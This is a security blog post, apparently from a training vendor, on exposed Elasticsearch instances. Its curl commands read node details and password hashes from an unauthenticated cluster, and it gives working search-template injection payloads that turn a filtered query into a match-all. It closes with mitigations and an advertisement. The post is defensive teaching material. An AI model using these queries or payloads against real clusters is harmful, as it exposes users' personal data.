Breaking: Elasticsearch instance left wide open by SomeCompany exposing millions of records, including passwords and other personal data… now to sports

Sound familiar? Headlines like this have become a front-page fixture over the past several years, as adoption of Elasticsearch, a powerful distributed search and analytics engine based on the Lucene indexing library, has grown rapidly. The combination of its rising popularity and its stark lack of default-enabled security features has ensured the widespread presence of misconfigured instances in the wild. This article explores the impact of a number of misconfigurations that occur when the best practice guidelines provided by the (excellent) official documentation are neglected.

Rubber ball

Elasticsearch exposes a JSON-based RESTful API that allows one to store, index, and search all kinds of documents. The general-purpose nature of the project makes it versatile enough to be used in many scenarios, but its full-text document search, alongside its powerful log analysis, metrics, and event functions, is where it really shines. The development team continuously provides ready-made solutions that build upon the Elasticsearch core, exemplified by the relatively new addition to the Elastic Stack, Elastic SIEM, a specialized component that leverages the existing system to perform real-time analysis of security alerts and network events.

Elasticsearch is a complex system overall, but for the sake of the article, we can think of it as a fancy NoSQL database, or perhaps more precisely, an extremely powerful, pliable, document storage system. This post briefly outlines the impact of leaving an unsecured (and possibly outdated) Elasticsearch instance in the cloud, and some obvious mitigation strategies. Moreover, it discusses an interesting case of NoSQL injection that may happen when using search templates.

In the following, we’ll use curl to interact with the exposed REST API for the sake of convenience, but the same can be achieved using the Java High Level REST Client too.

Exposed instances

Newcomers can start an Elasticsearch instance in seconds; in fact, a basic setup requires no configuration, and the server is immediately able to process requests on TCP port 9200… with no authentication whatsoever. Anyone able to reach the REST server can issue a command of their choice since there is no access control in place by default. The default Elasticsearch security policy only works well if the instance resides in an isolated environment; this is by design, yet it is often overlooked by developers and application architects who recklessly expose their Elasticsearch instances to the world.

The consequences are obvious: without any access control mechanism in place, there is no difference between a malicious user and the legitimate Elasticsearch administrator. This already says it all, but let’s take a look at some examples of what is possible when curl and an Elasticsearch instance meet in the wild. For starters, by simply querying the REST URL, it is possible to obtain some basic information about the host and the software running on it:

$ curl 'elasticsearch.secureflag.com:9200/?pretty=true'
{
  "name" : "5d9daa95e92d",
  "cluster_name" : "docker-cluster",
  "cluster_uuid" : "eVG_XS50R6iAItE6vd4yDQ",
  "version" : {
    "number" : "7.8.1",
    "build_flavor" : "default",
    "build_type" : "docker",
    "build_hash" : "b5ca9c58fb664ca8bf9e4057fc229b3396bf3a89",
    "build_date" : "2020-07-21T16:40:44.668009Z",
    "build_snapshot" : false,
    "lucene_version" : "8.5.1",
    "minimum_wire_compatibility_version" : "6.8.0",
    "minimum_index_compatibility_version" : "6.0.0-beta1"
  },
  "tagline" : "You Know, for Search"
}

A much more detailed output can be obtained by querying information about the whole Elasticsearch cluster:

$ curl 'elasticsearch.secureflag.com:9200/_nodes?pretty=true'

The output is too verbose to be shown here; however, the entry for each node of the Elasticsearch cluster contains the following details:

  • IP addresses and ports used by the Elasticsearch instance;
  • operating system and architecture;
  • hardware specification and computing power;
  • running JVM including the arguments (this can expose sensitive material such as local paths);
  • plugins and modules used by Elasticsearch including version numbers.
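
To make the list above more concrete, here is a minimal Python sketch that pulls those details out of a parsed /_nodes response. The sample dictionary is hand-made and heavily trimmed, every value in it is invented, and the field names (ip, os, jvm.input_arguments, plugins) reflect the 7.x response layout as far as I know it, so check them against a real cluster. The function name summarize_nodes is hypothetical.

```python
# Hand-made, trimmed stand-in for a /_nodes response (all values invented).
SAMPLE_NODES_RESPONSE = {
    "cluster_name": "docker-cluster",
    "nodes": {
        "node-id-1": {
            "name": "5d9daa95e92d",
            "ip": "172.17.0.2",
            "version": "7.8.1",
            "os": {"name": "Linux", "arch": "amd64"},
            "jvm": {
                "input_arguments": [
                    "-Xms1g",
                    "-Des.path.home=/usr/share/elasticsearch",
                ]
            },
            "plugins": [{"name": "analysis-icu", "version": "7.8.1"}],
        }
    },
}


def summarize_nodes(response):
    """Return one small dict per node with the details listed above."""
    summaries = []
    for node in response.get("nodes", {}).values():
        os_info = node.get("os", {})
        jvm_args = node.get("jvm", {}).get("input_arguments", [])
        summaries.append({
            "name": node.get("name"),
            "ip": node.get("ip"),
            "os": "{} ({})".format(os_info.get("name"), os_info.get("arch")),
            # Arguments containing a slash usually carry a local filesystem path.
            "paths_in_jvm_args": [arg for arg in jvm_args if "/" in arg],
            "plugins": [
                "{} {}".format(p.get("name"), p.get("version"))
                for p in node.get("plugins", [])
            ],
        })
    return summaries


for summary in summarize_nodes(SAMPLE_NODES_RESPONSE):
    print(summary)
```

Even this reduced view hands an attacker a software inventory and a local path, which is why the endpoint should never be reachable by untrusted parties.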

Now, of course, it is possible to query and interact with the indices, for example to access the users index:

$ curl 'http://elasticsearch.secureflag.com:9200/users/_search?pretty=true'
{
  "took" : 14,
  "timed_out" : false,
  "_shards" : {
    "total" : 1,
    "successful" : 1,
    "skipped" : 0,
    "failed" : 0
  },
  "hits" : {
    "total" : {
      "value" : 2,
      "relation" : "eq"
    },
    "max_score" : 1.0,
    "hits" : [
      {
        "_index" : "users",
        "_type" : "_doc",
        "_id" : "t57pw3MBXOdYtjiqUWfb",
        "_score" : 1.0,
        "_source" : {
          "fullname" : "Alice",
          "email" : "alice@secureflag.com",
          "password" : "$2a$10$FhAbZ8itaZwK.qQcAyrOpeHb5ok.b9TOY7SVvRjsRART2cBEAwrVm"
        }
      },
      {
        "_index" : "users",
        "_type" : "_doc",
        "_id" : "uJ7pw3MBXOdYtjiqUmcU",
        "_score" : 1.0,
        "_source" : {
          "fullname" : "Bob",
          "email" : "bob@secureflag.com",
          "password" : "$2a$10$M.4rTvFfptlYX74H0m5WJ.qlYhdTmlG2Wdlin50OCXkym4.yyIbki"
        }
      }
    ]
  }
}

Needless to say, in this scenario it is also possible to delete, insert, and alter the content of the indices. Last but not least, another important aspect to consider is the fact that the aforementioned interaction happens over an insecure HTTP transport by default.

This misconfiguration is the most common scenario, and one that has been exploited numerous times in recent years: recall the headline regarding an unsecured and exposed Elasticsearch instance leaking sensitive data such as passwords, phone numbers, personal conversations, etc. One of the most recent examples of such an incident involves a popular VPN provider, UFO VPN, which was discovered to have left one of its Elasticsearch clusters unsecured in the wild, leaking almost 1 TB of sensitive user material to whoever was in technical reach at the time. What’s worse is the ensuing loss of credibility that the company experienced, since this leak appears to (drastically!) contradict their privacy policy about what information they collect and how.

The obvious mitigation for all of this is to simply cease exposing insecure Elasticsearch instances to the world! Most of the time, there is no reason at all to expose them, especially for small solutions. There are, however, cases in which this approach is not feasible, so developers and application architects have employed creative and often error-prone solutions to overcome the lack of security features in Elasticsearch. One common approach has been to place a proxy in front of the Elasticsearch cluster to provide encrypted communication and authentication. Luckily, since versions 6.8.0 and 7.1.0, the free version of Elasticsearch ships with some core security features that previously required a Gold subscription, including TLS for encrypted communications and role-based access control (RBAC), among others.

While this is great news, those are opt-in features that require some configuration, and users should be aware of this so they can refer to the official documentation to learn how to secure their stack.
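
Because the features are opt-in, it is worth verifying that they are actually switched on. The following is a minimal Python sketch, not an official tool: it sends one unauthenticated request to the root endpoint and classifies the HTTP status, on the understanding that a cluster with authentication enabled rejects anonymous requests with 401. The names classify_status and probe are hypothetical, and connection or TLS errors are deliberately left to propagate.

```python
import urllib.error
import urllib.request


def classify_status(status_code):
    """Map the HTTP status of an unauthenticated request to a rough verdict."""
    if status_code == 200:
        return "open: answered without credentials"
    if status_code in (401, 403):
        return "protected: credentials required"
    return "inconclusive: HTTP {}".format(status_code)


def probe(base_url, opener=urllib.request.urlopen):
    """Send one unauthenticated GET to base_url and classify the reply.

    The opener parameter exists only so the function can be exercised
    without a network connection.
    """
    try:
        with opener(base_url, timeout=5) as response:
            return classify_status(response.status)
    except urllib.error.HTTPError as error:
        # urllib raises on 4xx/5xx replies; the status code is still available.
        return classify_status(error.code)
```

A call such as probe("http://elasticsearch.secureflag.com:9200/") against the instance used in this article would be expected to report it as open.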

NoSQL injection

Even a properly secured Elasticsearch cluster might still be vulnerable to a subtle form of NoSQL injection. In fact, there are many ways to perform queries against the database, one of which is by using search templates. A search template is a way to specify parameterised queries, with the mechanism using the Mustache template language to describe the partial query.

For example, consider the following contrived search template, which filters the hits whose email field matches the value specified by the template parameter {{{email}}}:

$ curl 'http://elasticsearch.secureflag.com:9200/_scripts/my-template?pretty=true' \
        -H 'Content-Type: application/json' -d @- <<EOF
{
  "script": {
    "lang": "mustache",
    "source": {
      "query": {
        "match": {
          "email": {
            "query": "{{{email}}}",
            "operator": "and"
          }
        }
      }
    }
  }
}
EOF
{
  "acknowledged" : true
}

The above request registers the search template called my-template; it can then be used to look up the user whose email is bob@secureflag.com:

$ curl 'http://elasticsearch.secureflag.com:9200/users/_search/template?pretty=true' \
     -H 'Content-Type: application/json' -d @- <<EOF
{
  "id": "my-template",
  "params": {
    "email": "bob@secureflag.com"
  }
}
EOF
{
  "took" : 6,
  "timed_out" : false,
  "_shards" : {
    "total" : 1,
    "successful" : 1,
    "skipped" : 0,
    "failed" : 0
  },
  "hits" : {
    "total" : {
      "value" : 1,
      "relation" : "eq"
    },
    "max_score" : 0.8754687,
    "hits" : [
      {
        "_index" : "users",
        "_type" : "_doc",
        "_id" : "u57qw3MBXOdYtjiq5mfi",
        "_score" : 0.8754687,
        "_source" : {
          "fullname" : "Bob",
          "email" : "bob@secureflag.com",
          "password" : "$2a$10$M.4rTvFfptlYX74H0m5WJ.qlYhdTmlG2Wdlin50OCXkym4.yyIbki"
        }
      }
    ]
  }
}

However, there is a problem with that template: using triple curly braces in {{{email}}} disables the automatic escaping mechanism of Mustache, thus causing double quotes to be inserted literally into the Elasticsearch query. This allows a malicious user who has some control over the email parameter to craft a special payload that escapes the JSON string associated with the email JSON key.
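
The effect of a literally inserted double quote can be reproduced offline. The sketch below is a simplified stand-in for the template engine, not Elasticsearch's actual Mustache implementation: it pastes the parameter into the template text with a plain string replacement, which is what an unescaped placeholder amounts to, and then checks whether the result is still well-formed JSON. The names render_unescaped and renders_to_valid_json are hypothetical.

```python
import json

# Text form of the template source registered above.
TEMPLATE = '{"query": {"match": {"email": {"query": "{{{email}}}", "operator": "and"}}}}'


def render_unescaped(template, email):
    """Stand-in for a triple-brace placeholder: paste the value in verbatim."""
    return template.replace("{{{email}}}", email)


def renders_to_valid_json(email):
    """Report whether the rendered query is still well-formed JSON."""
    try:
        json.loads(render_unescaped(TEMPLATE, email))
    except json.JSONDecodeError:
        return False
    return True


print(renders_to_valid_json("bob@secureflag.com"))   # True
print(renders_to_valid_json('bob"@secureflag.com'))  # False
```

A single stray quote ends the JSON string early and leaves the rest of the value dangling, which shows that the parameter is treated as part of the query text rather than as data. A payload that closes the string and then supplies valid JSON of its own goes one step further.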

To better understand this, let us consider an example where the following value is assigned to the email parameter:

whatever","INJECTED-KEY":"INJECTED-VALUE

It is possible to ask Elasticsearch to render a template without actually executing it by calling the _render/template endpoint instead of _search/template:

$ curl 'http://elasticsearch.secureflag.com:9200/_render/template?pretty=true' \
     -H 'Content-Type: application/json' -d @- <<EOF
{
  "id": "my-template",
  "params": {
    "email": "whatever\",\"INJECTED-KEY\":\"INJECTED-VALUE"
  }
}
EOF
{
  "template_output" : {
    "query" : {
      "match" : {
        "email" : {
          "query" : "whatever",
          "INJECTED-KEY" : "INJECTED-VALUE",
          "operator" : "and"
        }
      }
    }
  }
}

Et voilà, we successfully managed to inject a JSON key-value pair into the query! This can be exploited to alter the semantics of the query and hence its results.

For example, we can nullify the effect of match by submitting an empty query and setting the zero_terms_query parameter to all. This parameter controls the behavior of Elasticsearch when the text analyzer produces an empty query. By passing all, we are requesting that all the documents are returned when this happens, while by passing an empty string as the query, we are making sure that the result after the analysis is an empty string as well.

The following query is equivalent to a match_all query:

$ curl 'http://elasticsearch.secureflag.com:9200/users/_search/template?pretty=true' \
     -H 'Content-Type: application/json' -d @- <<EOF
{
  "id": "my-template",
  "params": {
    "email": "\",\"zero_terms_query\":\"all"
  }
}
EOF
{
  "took" : 2,
  "timed_out" : false,
  "_shards" : {
    "total" : 1,
    "successful" : 1,
    "skipped" : 0,
    "failed" : 0
  },
  "hits" : {
    "total" : {
      "value" : 2,
      "relation" : "eq"
    },
    "max_score" : 1.0,
    "hits" : [
      {
        "_index" : "users",
        "_type" : "_doc",
        "_id" : "up7qw3MBXOdYtjiq5mej",
        "_score" : 1.0,
        "_source" : {
          "fullname" : "Alice",
          "email" : "alice@secureflag.com",
          "password" : "$2a$10$FhAbZ8itaZwK.qQcAyrOpeHb5ok.b9TOY7SVvRjsRART2cBEAwrVm"
        }
      },
      {
        "_index" : "users",
        "_type" : "_doc",
        "_id" : "u57qw3MBXOdYtjiq5mfi",
        "_score" : 1.0,
        "_source" : {
          "fullname" : "Bob",
          "email" : "bob@secureflag.com",
          "password" : "$2a$10$M.4rTvFfptlYX74H0m5WJ.qlYhdTmlG2Wdlin50OCXkym4.yyIbki"
        }
      }
    ]
  }
}

As we can see, the result now contains both users.
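
Since the problem stems from the triple braces, the natural remedy is a regular {{email}} placeholder, so that the value is escaped before it reaches the query. The sketch below illustrates why that neutralizes the payload. It assumes that the automatic escaping behaves like JSON string escaping, emulated here with json.dumps; this is a stand-in for the real template engine, and render_escaped is a hypothetical name.

```python
import json

# Same template as before, but with an escaped (double-brace) placeholder.
TEMPLATE = '{"query": {"match": {"email": {"query": "{{email}}", "operator": "and"}}}}'
PAYLOAD = '","zero_terms_query":"all'


def render_escaped(template, email):
    """Stand-in for a double-brace placeholder: JSON-escape, then substitute."""
    escaped = json.dumps(email)[1:-1]  # drop the surrounding quotes json.dumps adds
    return template.replace("{{email}}", escaped)


match_clause = json.loads(render_escaped(TEMPLATE, PAYLOAD))["query"]["match"]["email"]
print(match_clause)
```

With escaping in place, the whole payload ends up inside the query string and no zero_terms_query key appears in the match clause, so the search simply looks for an unlikely email address.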

Outdated versions

Out of all the vulnerabilities associated with Elasticsearch, the most impactful is very likely CVE-2014-3120. This issue allowed an attacker to exploit the evaluation of dynamic scripts in the query to execute arbitrary, and potentially malicious, Java code on the server hosting the instance. Again, this behavior is not a security flaw per se, but it has a huge impact when it can be exploited remotely on an Elasticsearch instance left unsecured in the cloud.

Software has bugs and security flaws, and Elasticsearch is no exception. Thus, it is important to always stay up to date with the newest versions, as well as any associated security advisories. To emphasise this point, consider that the latest security issue at the time of writing (CVE-2020-7014) was published a mere two months ago.
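
As a small aid to that habit, the version number reported by the root endpoint can be checked automatically. The following Python sketch compares it against the two releases mentioned earlier (6.8.0 and 7.1.0), from which the free version ships the core security features. The function names are hypothetical, and the check says nothing about whether a given release is affected by a particular advisory.

```python
def parse_version(number):
    """Turn '7.8.1' into (7, 8, 1); a suffix such as '-beta1' is dropped."""
    core = number.split("-", 1)[0]
    return tuple(int(part) for part in core.split("."))


def has_free_security_features(number):
    """True for 6.8.0 and later 6.x releases, and for 7.1.0 and later."""
    version = parse_version(number)
    if version[0] == 6:
        return version >= (6, 8, 0)
    return version >= (7, 1, 0)


for candidate in ("7.8.1", "7.0.1", "6.8.0", "6.7.2"):
    print(candidate, has_free_security_features(candidate))
```

The input would be the version.number field of the JSON document returned by the root endpoint, as shown at the beginning of this article.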

Wrap-up

Over the last few years, Elasticsearch has become infamous for its all too frequent links with large-scale, notorious data breaches. On its face, this might give the false impression that Elasticsearch is not a safe or particularly security-oriented product. However, the reality is that it is no less secure than any other database; it just comes out of the box with a set of insecure defaults. “Insecure” here depends on the context: Elasticsearch is secure by default as long as it is not exposed to untrusted parties and serves a single consumer; but this, of course, is often not the case.

The fact is that developers must know their tools. Unlike the headline that kicked off this article, this is not news, and it is certainly not limited to Elasticsearch. There is often plenty of documentation available; all you need to do is RTFM!

At SecureFlag, we teach Secure DevOps practices through hands-on, practical exercises to ensure your code and infrastructure are built as robustly as they can be. We know full well that good security practices can often be difficult to learn, let alone implement: that’s why we built a training platform to teach participants in real-time, on dedicated Elasticsearch instances, where they learn to identify security misconfigurations and remediate them hands-on.

SecureFlag Elasticsearch Exercise

The platform offers 100% hands-on training, with no multiple-choice questions involved, and uses an engine able to live-test user changes, instantly displaying whether the infrastructure has been secured, and awarding points upon exercise completion.

Security starts with the first keystroke - contact SecureFlag for a demo today!